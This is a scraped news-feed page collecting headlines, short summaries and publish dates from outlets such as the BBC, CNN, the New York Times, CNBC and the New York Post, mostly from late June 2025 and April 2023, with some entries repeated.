Canada rescinds digital services tax after Trump cuts off U.S. trade talks

The move comes after U.S. President Donald Trump announced over the weekend that he will be "terminating ALL discussions on Trade with Canada"

Article link

Date of publish: Mon, 30 Jun 2025 13:13:43 GMT

New York Post

Watch wild moment Nelly tells Ashanti he refuses to change their baby’s diapers: I’ve ‘got nothing for him’

The 50-year-old rapper joked to his friends, "Until he can say 'I'm hungry' [and] ... 'I need to use the bathroom,' it's gonna be a lot in [her] lap."

Article link

Date of publish: Mon, 30 Jun 2025 10:44:28 -0400

Watch wild moment Nelly tells Ashanti he refuses to change their baby’s diapers: I’ve ‘got nothing for him’

The 50-year-old rapper joked to his friends, "Until he can say 'I'm hungry' [and] ... 'I need to use the bathroom,' it's gonna be a lot in [her] lap."

Article link

Date of publish: Mon, 30 Jun 2025 10:44:28 -0400

Trump admin formally accuses Harvard of violating civil rights law over campus antisemitism

The Trump administration has formally accused Harvard University of violating civil rights laws by not doing enough to combat campus antisemitism, and is threatening to pull all federal funding from the prestige school.

Article link

Date of publish: Mon, 30 Jun 2025 10:44:25 -0400

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

NYT > Top Stories

Political Costs of Trump Tax Cuts, Medicaid and ‘Debt Slavery’

As the Senate prepares to vote on a key piece of the president’s domestic agenda, prominent critics, including Elon Musk, are speaking out.

Article link

Date of publish: Mon, 30 Jun 2025 14:07:16 +0000

New Cost of Trump’s Bill, Canada Backs Down in Trade Dispute, Gen Z’s Retirement Plan

Plus, the tricky science behind lime green Jell-O.

Article link

Date of publish: Mon, 30 Jun 2025 11:25:37 +0000

Trump Vowed to Dismantle MS-13. His Deal With Bukele Threatens That Effort.

Top gang leaders being sent back to El Salvador were part of a lengthy federal investigation that has amassed evidence of a corrupt pact between the Bukele government and MS-13.

Article link

Date of publish: Mon, 30 Jun 2025 09:00:33 +0000

BBC News

At least 20 Palestinians killed in Israeli strike on Gaza seafront cafe, witnesses and rescuers say

The outdoor cafe was frequently used by journalists, activists and local residents.

Article link

Date of publish: Mon, 30 Jun 2025 13:56:59 GMT

'Unprecedented' alerts in France as blistering heat grips Europe

Dozens of the country's mainland regions are currently under the second-highest alert as the heatwave continues.

Article link

Date of publish: Mon, 30 Jun 2025 12:51:48 GMT

US must rule out more strikes before new talks, Iranian minister tells BBC

Majid Takht-Ravanchi said the Trump administration has "not made their position clear" on further attacks.

Article link

Date of publish: Mon, 30 Jun 2025 11:39:29 GMT

Two firefighters shot dead in Idaho ambush, police say

The suspect has been found dead after the firefighters were killed with a high-powered weapon, authorities say.

Article link

Date of publish: Mon, 30 Jun 2025 07:07:20 GMT

I lost half my weight in jail, but I'm not broken, says freed Belarus opposition leader

Sergei Tikhanovsky was kept isolated in bare, tiny cells and tells the BBC that Belarus must free other political prisoners.

Article link

Date of publish: Mon, 30 Jun 2025 05:26:50 GMT

Key witness in ex-Peru mayor's corruption case found dead

José Miguel Castro was collaborating with prosecutors in the corruption case against Susana Villarán.

Article link

Date of publish: Mon, 30 Jun 2025 12:09:45 GMT

Jury retires in mushroom murder trial in Australia

They will decide whether Erin Patterson murdered relatives with beef Wellingtons laced with toxic mushrooms.

Article link

Date of publish: Mon, 30 Jun 2025 03:06:18 GMT

Nearly 12 million estimated to lose health coverage under Trump budget bill

The spending plan could also add nearly $3.3tn (£2.4tn) in debt, according to non-partisan analysis.

Article link

Date of publish: Sun, 29 Jun 2025 22:01:03 GMT

Prada acknowledges footwear design's Indian roots after backlash

Prada described the Kolhapuri sandals as "leather footwear" but did not mention its origins, prompting backlash.

Article link

Date of publish: Mon, 30 Jun 2025 08:24:48 GMT

Trump says he has 'a group of very wealthy people' to buy TikTok

Trump says he thinks China's president will probably approve a sale to the unidentified group.

Article link

Date of publish: Sun, 29 Jun 2025 18:52:21 GMT

Watch: Humanoid robots stumble through football match in China

The robots kicked, scored and tumbled while competing at a tourmentant in Beijing.

Article link

Date of publish: Mon, 30 Jun 2025 05:03:01 GMT

One of Hong Kong's last major pro-democracy parties disbands

It is the third major opposition party to disband this year, ahead of the fifth anniversary of the Beijing-imposed national security law.

Article link

Date of publish: Sun, 29 Jun 2025 18:42:25 GMT

Boeing's 787 Dreamliner was deemed the 'safest' of planes. The whistleblowers were always less sure

Long before the Air India tragedy, the cause of which is still to be determined, people who had worked on the 787 had raised concerns about the production standards

Article link

Date of publish: Sun, 29 Jun 2025 22:57:37 GMT

'Mariupol is diseased': Residents deny Russian claims occupied city returning to normal

Russian shattered Mariupol with a months-long siege in 2022. Now, it says it's rebuilding it.

Article link

Date of publish: Sun, 29 Jun 2025 21:00:30 GMT

'Every word has come back to haunt me': China cracks down on women who write gay erotica

At least 30 writers have been arrested across the country since February, a lawyer tells the BBC.

Article link

Date of publish: Sun, 29 Jun 2025 22:28:50 GMT

Have we watched Messi's final game on global stage?

Lionel Messi signs off from potentially his final game on the global stage with a heavy defeat - but he still shows some magic touches.

Article link

Date of publish: Sun, 29 Jun 2025 19:30:18 GMT

Queen of Katwe's gambit still in play for Uganda's slum chess players

A famous chess club is still producing champions, but faces a daily struggle to survive.

Article link

Date of publish: Sun, 29 Jun 2025 07:11:51 GMT

'A little bit melting': Intense heat across Europe

A new heat record for June of 46C was set in Spain this weekend as Europe experiences an intense heatwave.

Article link

Date of publish: Mon, 30 Jun 2025 12:01:33 GMT

Crowds celebrate Pride in New York City, India, Mexico and more

Crowds have gathered at Pride celebrations around the world, including the Pride Parade NYC.

Article link

Date of publish: Sun, 29 Jun 2025 21:44:40 GMT

On the ground in Venice for Bezos's glitzy wedding

BBC Rome correspondent Sarah Rainsford reports from Venice, amid protests against the nuptials.

Article link

Date of publish: Sat, 28 Jun 2025 12:02:37 GMT

Did a JD Vance meme get tourist banned from the US?

US officials have denied claims that a Norwegian man was sent home because of a meme - but the case has raised international questions.

Article link

Date of publish: Fri, 27 Jun 2025 23:32:30 GMT

'Iran pulses with anger and even deeper grief', says BBC's Lyse Doucet

Lyse Doucet witnesses a mass state funeral for prominent figures killed in the recent conflict with Israel.

Article link

Date of publish: Sat, 28 Jun 2025 09:58:56 GMT

Satirical Bezos mannequins pop up in Venice ahead of wedding

Unflattering installations depicting Amazon founder and his bride-to-be are attracting attention in the Italian city.

Article link

Date of publish: Fri, 27 Jun 2025 11:22:31 GMT

Moment South Korean man sets Seoul metro carriage on fire

Authorities have released CCTV of an arson attack in Seoul on 31 May where six people suffered minor injuries.

Article link

Date of publish: Fri, 27 Jun 2025 05:43:00 GMT

US electrical worker left dangling after being hit by truck

The man suffered minor injuries and did not require hospital treatment, local media reported.

Article link

Date of publish: Fri, 27 Jun 2025 08:29:46 GMT

US Top News and Analysis

Home Depot is buying GMS for about $4.3 billion as retailer chases more home pros

Home Depot is trying to attract more sales from contractors and other home professionals.

Article link

Date of publish: Mon, 30 Jun 2025 14:24:25 GMT

Senate begins voting on dozens of amendment's to Trump's domestic spending bill

Lawmakers worked through the weekend to move President Donald Trump's bill closer to the finish line as Republicans' self-imposed July 4 deadline approaches.

Article link

Date of publish: Mon, 30 Jun 2025 14:03:21 GMT

Canada rescinds digital services tax after Trump cuts off U.S. trade talks

The move comes after U.S. President Donald Trump announced over the weekend that he will be "terminating ALL discussions on Trade with Canada"

Article link

Date of publish: Mon, 30 Jun 2025 13:13:43 GMT

Oracle stock jumps after $30 billion annual cloud deal revealed in filing

Oracle shares have jumped more than 33% this year, benefiting from cloud growth and the rise of artificial intelligence models.

Article link

Date of publish: Mon, 30 Jun 2025 14:44:36 GMT

WNBA announces three new teams in Cleveland, Detroit and Philadelphia

The new WNBA franchises will grow the league to 18 teams over the next few years.

Article link

Date of publish: Mon, 30 Jun 2025 14:34:39 GMT

Clean energy stocks fall as Trump bill taxes components from China, phases out credits

The latest version of President Donald Trump's "big, beautiful bill" hits clean energy hard, though Wall Street also views some companies as relative winners.

Article link

Date of publish: Mon, 30 Jun 2025 14:31:38 GMT

Wall Street strategist Tom Lee is aiming to create the MicroStrategy of Ethereum

Tom Lee of Fundstrat was appointed Chairman of the Board of Directors of BitMine Immersion Technologies, effective Monday.

Article link

Date of publish: Mon, 30 Jun 2025 12:23:07 GMT

How Raising Cane's overtook KFC to become the No. 3 chicken chain in the U.S.

Raising Cane's is now the third-largest chicken chain in the U.S. by sales, trailing only Chick-fil-A and Popeyes.

Article link

Date of publish: Mon, 30 Jun 2025 11:00:01 GMT

Moderna's flu vaccine shows positive late-stage trial results, paving way for combination Covid shot

The phase three study data clears the path forward for Moderna's combination jab targeting Covid-19 and influenza.

Article link

Date of publish: Mon, 30 Jun 2025 13:12:47 GMT

Google makes first foray into fusion in venture with MIT spinoff Commonwealth Fusion Systems

Google announces partnership with Commonwealth Fusion Systems, a private company spun off from the Massachusetts Institute of Technology. Here is what to know.

Article link

Date of publish: Mon, 30 Jun 2025 13:00:01 GMT

U.S. stocks are at record highs, but the outlook for the world's largest economy is no clearer

Economic modeling is "very difficult" right now because "things are changing constantly," Atlanta Fed President Raphael Bostic told CNBC's "Squawk Box Europe."

Article link

Date of publish: Mon, 30 Jun 2025 13:09:56 GMT

How much you need to retire comfortably in the 15 U.S. cities with the most adults 65 and older

Some of the most popular retirement communities in the U.S. require up to $3 million to retire comfortably.

Article link

Date of publish: Mon, 30 Jun 2025 13:00:01 GMT

Nvidia insiders dump more than $1 billion in stock, according to report

Nvidia insiders have sold more than $1 billion in shares over the last year, the Financial Times reported.

Article link

Date of publish: Sun, 29 Jun 2025 18:07:32 GMT

Sen. Thom Tillis says he won't seek re-election after opposing Trump megabill

Sen. Thom Tillis' announcement is likely to spur a competitive and costly election in the key battleground.

Article link

Date of publish: Sun, 29 Jun 2025 18:08:54 GMT

UK autos spared under U.S. tariff cut but steel still in question

Britain was the first country in the world to make a deal with the White House after U.S. President Donald Trump unveiled his reciprocal tariffs plans.

Article link

Date of publish: Mon, 30 Jun 2025 09:48:47 GMT

Tesla says it made its first driverless delivery of a new car to a customer

Tesla shared a video showing its first driverless delivery of a car to a customer.

Article link

Date of publish: Sun, 29 Jun 2025 16:26:17 GMT

An Energy Star inside U.S. homes is under attack from Trump, with the cost to homeowners uncertain

Donald Trump has railed against modern dishwashers, washing machines, light bulbs, showerheads and toilets. He's turned his ire into a presidential edict.

Article link

Date of publish: Sun, 29 Jun 2025 15:17:03 GMT

How BP became a potential takeover target

Shell's robust rejection of these reports appears to have, for now, thrown cold water on a potential takeover bid for BP.

Article link

Date of publish: Mon, 30 Jun 2025 05:28:00 GMT

At 20 years old, Reddit is defending its data and fighting AI with AI

After two decades, Reddit faces the emergence of AI chatbots that threaten to inhale its vast swaths of data and siphon its users.

Article link

Date of publish: Mon, 30 Jun 2025 09:17:20 GMT

German inflation unexpectedly falls to 2% in June, hitting ECB's target

Analysts polled by Reuters had expected a reading of 2.2% in the twelve months to June.

Article link

Date of publish: Mon, 30 Jun 2025 12:59:49 GMT

How China could shut down auto factories around the world

China dominates the world‘s production and processing of rare earth elements. A sudden export restriction sent the auto industry into panic.

Article link

Date of publish: Sat, 28 Jun 2025 12:00:01 GMT

Stablecoins go mainstream: Why banks and credit card firms are issuing their own crypto tokens

Stablecoins are seemingly everywhere, with Mastercard, Visa and JPMorgan all making recent moves in the crypto token space.

Article link

Date of publish: Sat, 28 Jun 2025 12:00:01 GMT

Trump says Mamdani must 'do the right thing' if elected mayor of New York City — or risk losing funding

It's not the first time President Donald Trump has threatened to withhold federal funding for local politicians, particularly those in blue states.

Article link

Date of publish: Sun, 29 Jun 2025 16:44:42 GMT

China's manufacturing activity contracts for a third month amid deflation woes

Chinese manufacturers have been grappling with a deepening price war, exacerbated by higher tariffs that dwarfed its U.S-bound exports.

Article link

Date of publish: Mon, 30 Jun 2025 04:17:52 GMT

China's biggest public AI drop since DeepSeek, Baidu's open source Ernie, is about to hit the market

Chinese internet search giant Baidu will open source its Ernie gen AI large language model as soon as this week, with uncertain consequences for the market.

Article link

Date of publish: Mon, 30 Jun 2025 14:31:41 GMT

Top Wall Street analysts like these 3 dividend stocks for enhanced returns

TipRanks' analyst ranking service discusses three dividend-paying stocks, including McDonald's and Halliburton, favored by Wall Street's top pros.

Article link

Date of publish: Sun, 29 Jun 2025 11:17:52 GMT

Op-ed: U.S. is losing rare earth metals war to China, and running out of time to win it back

The rate earth metals issue shows that it's time for the United States to treat critical minerals not as commodities, but as instruments of geopolitical power.

Article link

Date of publish: Sun, 29 Jun 2025 17:15:32 GMT

Use the ‘80-10-10’ rule to know if you’ve found the right house, says real estate agent of 10 years

Looking to buy a home? Real estate agent Dana Bull shares the simple formula that can help you cut through the noise find the right house for you.

Article link

Date of publish: Sat, 28 Jun 2025 14:00:01 GMT

I'm a psychologist who studies couples—people who are miserable in their relationships say 'no' to these 4 questions

Are you truly happy in your relationship? Mark Travers, a psychologist who studies couples, shares four questions can help you find out what might be missing.

Article link

Date of publish: Sun, 29 Jun 2025 13:27:39 GMT

The No. 1 trait this CEO looks for in a candidate: It can be ‘concerning’ if they don’t have it

Priyanka Jain, CEO of Evvy, wants an employee who can not only strategize, but also execute. At a startup, she says, "everybody has to be able to do both."

Article link

Date of publish: Sun, 29 Jun 2025 13:00:01 GMT

New York Post

Watch wild moment Nelly tells Ashanti he refuses to change their baby’s diapers: I’ve ‘got nothing for him’

The 50-year-old rapper joked to his friends, "Until he can say 'I'm hungry' [and] ... 'I need to use the bathroom,' it's gonna be a lot in [her] lap."

Article link

Date of publish: Mon, 30 Jun 2025 10:44:28 -0400

Watch wild moment Nelly tells Ashanti he refuses to change their baby’s diapers: I’ve ‘got nothing for him’

The 50-year-old rapper joked to his friends, "Until he can say 'I'm hungry' [and] ... 'I need to use the bathroom,' it's gonna be a lot in [her] lap."

Article link

Date of publish: Mon, 30 Jun 2025 10:44:28 -0400

Trump admin formally accuses Harvard of violating civil rights law over campus antisemitism

The Trump administration has formally accused Harvard University of violating civil rights laws by not doing enough to combat campus antisemitism, and is threatening to pull all federal funding from the prestige school.

Article link

Date of publish: Mon, 30 Jun 2025 10:44:25 -0400

Dana Carvey Admits He Made Joe Biden Seem Mentally “Compromised” In His ‘Saturday Night Live’ Impersonation

Carvey said it took him two years to perfect the impersonation.

Article link

Date of publish: Mon, 30 Jun 2025 10:37:28 -0400

Brazen bride slaps shocked guests with $500 last-minute fee — and that wasn’t the worst of it

She’s saying “I Do” — to taking your dough.  

Article link

Date of publish: Mon, 30 Jun 2025 10:19:16 -0400

Ryan Lochte’s estranged wife, Kayla Rae Reid, hints at ‘betrayal’ amid divorce, six-figure financial woes

“Divorce isn’t the end of my story. It’s the beginning of my rebirth," she wrote. "I didn’t choose to be broken, but I’m choosing to rebuild.”

Article link

Date of publish: Mon, 30 Jun 2025 10:09:21 -0400

Ryan Lochte’s estranged wife, Kayla Rae Reid, hints at ‘betrayal’ amid divorce, six-figure financial woes

“Divorce isn’t the end of my story. It’s the beginning of my rebirth," she wrote. "I didn’t choose to be broken, but I’m choosing to rebuild.”

Article link

Date of publish: Mon, 30 Jun 2025 10:09:21 -0400

Prince Harry and Meghan Markle ‘at the heart’ of King Charles’ funeral plans: report

It seems as though the ongoing royal rift isn't impacting the king's funeral plans.

Article link

Date of publish: Mon, 30 Jun 2025 10:05:40 -0400

Ukrainian POW branded with ‘Glory to Russia’ says torture left him begging for death

"While they were carrying me. I kept asking them, ‘Finish me off. Just end it,' but they didn’t," Andriy Pereverzev said.

Article link

Date of publish: Mon, 30 Jun 2025 10:05:33 -0400

Israel’s ‘Operation Narnia’ plan to kill Iran’s top nuclear scientists was 15 years in the making: report

The June 13 stealth attack saw nine scientists wiped out when Israel dropped a barrage of missiles onto their Tehran homes in a near-simultaneous onslaught.

Article link

Date of publish: Mon, 30 Jun 2025 10:03:17 -0400

Fanatics Sportsbook promo: New users get $1,000 no sweat first bet for the FIFA Club World Cup

Fanatics is offering new users a no-sweat first bet of up to $1,000 for the FIFA Club World Cup.

Article link

Date of publish: Mon, 30 Jun 2025 10:00:00 -0400

‘The Bear’ Season 4 Saw Ayo Edebiri Cooking On A Whole Other Level

Yes, chef Syd!

Article link

Date of publish: Mon, 30 Jun 2025 10:00:00 -0400

Vin Diesel shows off new physique at star-studded charity event

See Vin Diesel's new look as he appears less buff at Charlize Theron's Africa Outreach Project event in LA.

Article link

Date of publish: Mon, 30 Jun 2025 09:58:15 -0400

Robots replace hotel check-in staff — and a tourist freaks out when they talk back: ‘Don’t look at me’

Is it artificial inn-telligence?

Article link

Date of publish: Mon, 30 Jun 2025 09:46:52 -0400

Top House Dem Hakeem Jeffries demands socialist Zohran Mamdani ‘clarify’ his defense of ‘intifada’ chant

House Minority Leader Hakeem Jeffries called on socialist presumptive Democratic mayoral nominee Zohran Mamdani to clarify his position on the use of the phrase globalize the intifada.

Article link

Date of publish: Mon, 30 Jun 2025 09:45:45 -0400

Ariana Biermann Refuses To Comment On Kim Zolciak’s Alleged Gambling Addiction On ‘WWHL’

Biermann will never let money "ruin" her relationship with her mom.

Article link

Date of publish: Mon, 30 Jun 2025 09:45:13 -0400

Watch Beyoncé dangle midair during ‘Cowboy Carter’ tour performance due to ‘technical mishap’

Beyoncé was left dangling while performing in Houston, Texas for her “Cowboy Carter” tour. The pop star was stuck mid-air in a red car while singing “16 carriages.” Watch what happened in the clip! Subscribe to our YouTube for the latest on all your favorite stars.

Article link

Date of publish: Mon, 30 Jun 2025 09:37:48 -0400

Watch Beyoncé dangle midair during ‘Cowboy Carter’ tour performance due to ‘technical mishap’

Beyoncé was left dangling while performing in Houston, Texas for her “Cowboy Carter” tour. The pop star was stuck mid-air in a red car while singing “16 Carriages.” Watch what happened in the clip! Subscribe to our YouTube for the latest on all your favorite stars.

Article link

Date of publish: Mon, 30 Jun 2025 09:37:48 -0400

The cult-favorite eye cream that works overtime is quietly on sale

Your eyes will thank you.

Article link

Date of publish: Mon, 30 Jun 2025 09:29:41 -0400

Hertz customers outraged over AI-powered scanner that charges hundreds of dollars for small scuffs on rental cars

One frustrated Reddit user reported that he was charged $195 for a "ding" on one of the tired after renting from Hertz in Atlanta.

Article link

Date of publish: Mon, 30 Jun 2025 09:20:54 -0400

Pelicans exec Joe Dumars hits back at ‘naysayers’ after widely scrutinized NBA draft trade

The Pelicans faced backlash over their decision to give up an unprotected first-round pick in next year's draft to the Hawks, in order to trade up 10 spots to select Maryland's Derik Queen with the No. 13 overall pick.

Article link

Date of publish: Mon, 30 Jun 2025 09:20:38 -0400

‘Frustrated’ Steve Cohen breaks silence on his free-falling Mets: ‘Didn’t see this coming’

The Mets have won just three games since June 13, going 3-13 in that stretch. 

Article link

Date of publish: Mon, 30 Jun 2025 09:19:37 -0400

‘Cobra Kai’ star Alicia Hannah-Kim breaks silence after Martin Kove bite altercation: I was ‘attacked’

"I don't think anybody would think this is normal or warranted or acceptable."

Article link

Date of publish: Mon, 30 Jun 2025 09:10:35 -0400

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

Judge in Fox News-Dominion defamation trial: 'The parties have resolved their case'

The judge just announced in court that a settlement has been reached in the historic defamation case between Fox News and Dominion Voting Systems.

Article link

Date of publish: Wed, 19 Apr 2023 08:28:17 GMT

'Difficult to say with a straight face': Tapper reacts to Fox News' statement on settlement

A settlement has been reached in Dominion Voting Systems' defamation case against Fox News, the judge for the case announced. The network will pay more than $787 million to Dominion, a lawyer for the company said.

Article link

Date of publish: Tue, 18 Apr 2023 21:17:44 GMT

Millions in the US could face massive consequences unless McCarthy can navigate out of a debt trap he set for Biden

• DeSantis goes to Washington, a place he once despised, looking for support to take on Trump • Opinion: For the GOP to win, it must ditch Trump • Chris Christie mulling 2024 White House bid • Analysis: The fire next time has begun burning in Tennessee

Article link

Date of publish: Tue, 18 Apr 2023 20:34:45 GMT

White homeowner accused of shooting a Black teen who rang his doorbell turns himself in to face criminal charges

• 'A major part of Ralph died': Aunt of teen shot after ringing wrong doorbell speaks • 20-year-old woman shot after friend turned into the wrong driveway in upstate New York, officials say

Article link

Date of publish: Wed, 19 Apr 2023 04:29:05 GMT

Newly released video shows scene of Jeremy Renner's snowplow accident

Newly released body camera footage shows firefighters and sheriff's deputies rushing to help actor Jeremy Renner after a near-fatal snowplow accident in January. The "Avengers" actor broke more than 30 bones and suffered other severe injuries. CNN's Chloe Melas has more.

Article link

Date of publish: Tue, 18 Apr 2023 14:09:43 GMT

Jake Gyllenhaal and Jamie Lee Curtis spent the Covid-19 lockdown together

It's sourdough bread and handstands for Jake Gyllenhaal and Jamie Lee Curtis.

Article link

Date of publish: Tue, 18 Apr 2023 14:40:32 GMT

Toddler crawls through White House fence, prompts Secret Service response

A tiny intruder infiltrated White House grounds Tuesday, prompting a swift response from the US Secret Service.

Article link

Date of publish: Tue, 18 Apr 2023 17:38:16 GMT

Jamie Foxx remains hospitalized nearly a week after 'medical complication'

Jamie Foxx remains hospitalized in Georgia nearly a week after his daughter revealed the actor experienced a "medical complication," a source with knowledge of the matter told CNN on Monday.

Article link

Date of publish: Tue, 18 Apr 2023 00:27:07 GMT

A 13-year-old dies after participating in a Benadryl TikTok 'challenge'

A 13-year-old in Ohio has died after "he took a bunch of Benadryl," trying a dangerous TikTok challenge that's circulating online, according to a CNN affiliate and a GoFundMe account from his family.

Article link

Date of publish: Wed, 19 Apr 2023 15:01:06 GMT

See pizza delivery guy take out suspect fleeing police

Pizza guy delivers more than a pie, taking out a fleeing suspect. CNN's Jeanne Moos shows him putting his best foot forward.

Article link

Date of publish: Tue, 18 Apr 2023 16:40:22 GMT

Netflix is winding down its DVD business after 25 years

Netflix is officially winding down the business that helped make it a household name.

Article link

Date of publish: Tue, 18 Apr 2023 20:10:51 GMT

FTC chair Lina Khan warns AI could 'turbocharge' fraud and scams

Artificial intelligence tools such as ChatGPT could lead to a "turbocharging" of consumer harms including fraud and scams, and the US government has substantial authority to crack down on AI-driven consumer harms under existing law, members of the Federal Trade Commission said Tuesday.

Article link

Date of publish: Tue, 18 Apr 2023 17:59:38 GMT

Eating too much of these foods is driving the rise in type 2 diabetes, study says

Gobbling up too many refined wheat and rice products, along with eating too few whole grains, is fueling the growth of new cases of type 2 diabetes worldwide, according to a new study that models data through 2018.

Article link

Date of publish: Mon, 17 Apr 2023 16:02:46 GMT

ADHD medication abuse in schools is a 'wake-up call'

At some middle and high schools in the United States, 1 in 4 teens report they've abused prescription stimulants for attention deficit hyperactivity disorder during the year prior, a new study found.

Article link

Date of publish: Tue, 25 Apr 2023 17:44:36 GMT

Apple CEO was presented with an original Macintosh. See his reaction

CEO Tim Cook personally welcomed customers to the new Apple store in Mumbai as the tech company opens its first retail stores in India. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:17:25 GMT

Democrats bash Justice Clarence Thomas but their plan to investigate ethics allegations is unclear

Senate Democrats railed against Justice Clarence Thomas on Tuesday amid reports that the Supreme Court conservative failed to disclose luxury travel, gifts and a real estate transaction involving a GOP megadonor, but their plan to investigate the conservative jurist remains unclear.

Article link

Date of publish: Tue, 18 Apr 2023 20:29:46 GMT

Russia is 'going backwards' in equipment and deploying post WWII-era tanks, according to Western officials

• Jailed Wall Street Journal reporter Evan Gershkovich denied detention appeal in Moscow • Putin visits Russian troops at military headquarters in Kherson • Watch moment WSJ journalist appears in Russian court

Article link

Two Russians claiming to be former Wagner commanders admit killing children and civilians in Ukraine

Two Russian men who claim to be former Wagner Group commanders have told a human rights activist that they killed children and civilians during their time in Ukraine.

Article link

Date of publish: Tue, 18 Apr 2023 19:07:52 GMT

'My stomach is hurting from laughing': Hear panelist's reaction to DeSantis' threat to Disney

CNN panelists react to Florida Gov. Ron DeSantis floating the idea of building a competing theme park next to Disney World in Orlando.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:56 GMT

GOP prepared to block vote to replace Feinstein on Senate Judiciary

Senate Majority Leader Chuck Schumer said on Tuesday that he hopes to replace Democratic Sen. Dianne Feinstein on the Senate Judiciary Committee with Sen. Ben Cardin of Maryland and aims to set up a floor vote on the issue this afternoon, which Republicans are expected to block.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:13 GMT

Oklahoma governor calls on officials to resign over recording of racist and threatening remarks

Article link

Date of publish: Tue, 18 Apr 2023 17:33:17 GMT

McCarthy slams Biden in handling of US debt

House Speaker Kevin McCarthy traveled to Wall Street on Monday to deliver a fresh warning that the House GOP majority will refuse to lift a cap on government borrowing unless Biden agrees to spending cuts that would effectively neutralize his domestic agenda.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:01 GMT

US warns Russia not to touch American nuclear technology at Ukrainian nuclear plant

The US has sensitive nuclear technology at a nuclear power plant inside Ukraine and is warning Russia not to touch it, according to a letter the US Department of Energy sent to Russia's state-owned nuclear energy firm Rosatom last month.

Article link

Date of publish: Wed, 19 Apr 2023 08:35:33 GMT

Repeated gunshots fired on live TV as ex-lawmaker shot by assassins

Atiq Ahmed, a former lawmaker in India's parliament, convicted of kidnapping, was shot dead along with his brother while police were escorting them for a medical check-up in a slaying caught on live television on Saturday. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:41:42 GMT

FDA clears the way for additional bivalent boosters for certain vulnerable individuals

The U.S. Food and Drug Administration amended the terms of its emergency use authorizations for the Pfizer and Moderna bivalent vaccines on Tuesday, allowing people ages 65 and older and certain people with weakened immunity to get additional doses before this fall's vaccination campaigns.

Article link

Date of publish: Tue, 18 Apr 2023 15:09:15 GMT

Maine authorities detained a person of interest after 4 people were found dead in a home and 3 others shot while driving

Maine authorities have detained a person of interest and continue to investigate after two shooting incidents that appear to be connected left at least four people dead and three others injured, state police said.

Article link

Date of publish: Wed, 19 Apr 2023 01:49:51 GMT

Southwest says flights resumed after delays caused by 'tech issues'

• Delta Air Lines reports record bookings for summer travel • Air France and Airbus acquitted in trial over 2009 plane crash

Article link

Date of publish: Tue, 18 Apr 2023 17:15:29 GMT

Damar Hamlin cleared to resume football activities after January cardiac arrest

Buffalo Bills safety Damar Hamlin, who has been cleared to resume football activities, said Tuesday his cardiac arrest during an NFL game in January was caused by commotio cordis.

Article link

Date of publish: Tue, 18 Apr 2023 22:11:37 GMT

Pilot makes history after landing on top of a 56-story hotel

Polish pilot Lukasz Czepiela made history after landing a plane on a helipad at the top of a 56-story hotel in Dubai.

Article link

Date of publish: Sun, 19 Mar 2023 11:22:30 GMT

Top US Navy admiral defends non-binary sailor amid some Republican criticism

The top US Navy admiral ardently defended a non-binary sailor on Tuesday amid some criticism from Republican lawmakers, saying he is "particularly proud of this sailor."

Article link

Date of publish: Tue, 18 Apr 2023 19:56:40 GMT

Fulton County DA says fake Trump electors are incriminating one another and wants lawyer disqualified

The Fulton County District Attorney's office said some fake electors for Donald Trump have implicated each other in potential criminal activity and is seeking to disqualify their lawyer, according to a new court filing.

Article link

Date of publish: Wed, 19 Apr 2023 15:31:24 GMT

High speed trains are racing across the world. But not in America

High speed trains have proved their worth across the world over the past 50 years.

Article link

Date of publish: Wed, 19 Apr 2023 02:39:40 GMT

Podcast: One country musician is calling for other artists to oppose assault rifles
Here's what you need to know if you haven't filed your return yet — and even if you have

It's April 18, the official deadline to file your federal and state income tax returns for 2022. (It is also, apparently, National Animal Crackers Day for those who celebrate.)

Article link

Date of publish: Tue, 18 Apr 2023 14:15:43 GMT

Undocumented immigrants are paying their taxes today, too

It's a surprising fact that's often overlooked in the immigration debate.

Article link

Date of publish: Tue, 18 Apr 2023 18:29:24 GMT

Opinion: Why millionaires like us want to pay more in taxes

Tuesday is Tax Day in America, one of the most stressful days of the year, when many taxpayers will finally end their procrastination, file their federal returns, and hope for a refund from the IRS. But for many of the nation's wealthiest, it's just another Tuesday.

Article link

Date of publish: Mon, 17 Apr 2023 19:32:49 GMT

'World's longest' purpose-built cycling tunnel opens in Norway

There are many ways to explore the seven mountains that surround the picturesque UNESCO World Heritage city of Bergen on Norway's fjord-studded west coast. The newest, however, might well be record-breaking.

Article link

Date of publish: Tue, 18 Apr 2023 10:44:27 GMT

Artist rejects photo prize after AI-generated image wins award

A German artist has rejected an award from a prestigious international photography competition after revealing that his submission was generated by Artificial Intelligence (AI).

Article link

Date of publish: Tue, 18 Apr 2023 15:27:54 GMT

These ships disappeared in Lake Superior a century ago. Watch as they're found again

The Great Lakes Shipwreck Historical Society has found two of three ships that sank in the same Lake Superior storm more than a century ago, locating one in 2021 and the other in 2022.

Article link

Date of publish: Tue, 18 Apr 2023 19:29:01 GMT

Erotic images of seniors show sex and intimacy in new light

What does intimacy look like for seniors? There's no end to sex scenes and other steamy content featuring the young and unwrinkled, but past a certain age, popular culture largely draws a blank — or treats sex as a punchline.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:57 GMT

China's economy is off to a solid start, rising 4.5% in Q1 2023

China's economy is off to a solid start in 2023 following its emergence from three years of strict pandemic restrictions.

Article link

Date of publish: Tue, 18 Apr 2023 07:01:12 GMT

Even when wives make as much as husbands, they still do more at home

